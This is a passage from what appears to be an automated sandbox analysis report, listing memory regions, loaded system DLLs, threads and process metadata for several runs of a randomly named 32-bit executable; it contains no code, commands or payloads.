0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6552 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6553 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6554 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6555 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6556 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6557 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6558 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 6841 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 6842 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6843 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6844 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6845 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6846 start_va = 0x440000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 6863 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6864 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7266 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7267 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 7268 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7269 start_va = 0x550000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 7270 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7271 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7272 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 7273 start_va = 0x650000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 7274 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 7275 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7276 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 7277 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 7278 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7279 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7280 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7281 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7282 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7283 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7284 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7285 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7286 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7287 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7607 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7608 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7609 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7610 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7611 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 7691 start_va = 0x750000 end_va = 0x8d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 7692 start_va = 0x8e0000 end_va = 0x909fff monitored = 0 entry_point = 0x8e5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7693 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 240 os_tid = 0xb84 Thread: id = 272 os_tid = 0x11b8 Process: id = "77" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xb6ed000" os_pid = "0x4b4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6566 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6567 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6568 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6569 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6570 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6571 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6572 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6573 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6574 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6575 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6576 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6577 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6578 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6579 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6580 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6581 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 6865 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 6866 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6867 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6868 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6885 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6886 start_va = 0x4d0000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 6887 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6888 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7304 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7305 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 7306 start_va = 0x4d0000 end_va = 0x58dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7307 start_va = 0x640000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 7308 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7309 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7310 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 7311 start_va = 0x740000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 7312 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 7313 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7314 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 7315 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 7316 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7317 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7318 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7319 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7320 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7321 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7322 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7630 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7631 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7632 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7633 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7634 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7635 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7636 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7637 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 7694 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7695 start_va = 0x840000 end_va = 0x9c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 7705 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 241 os_tid = 0x101c Thread: id = 274 os_tid = 0xf68 Process: id = "78" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xb7e8000" os_pid = "0x1024" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6608 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6609 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6610 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6611 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6612 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6613 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6614 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6615 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6616 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6617 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6618 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6619 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6620 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6621 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6622 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6623 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 6977 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 6978 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6979 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6980 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6981 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6982 start_va = 0x440000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 6983 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7000 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7001 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7002 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 7389 start_va = 0x5a0000 end_va = 0x65dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7390 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 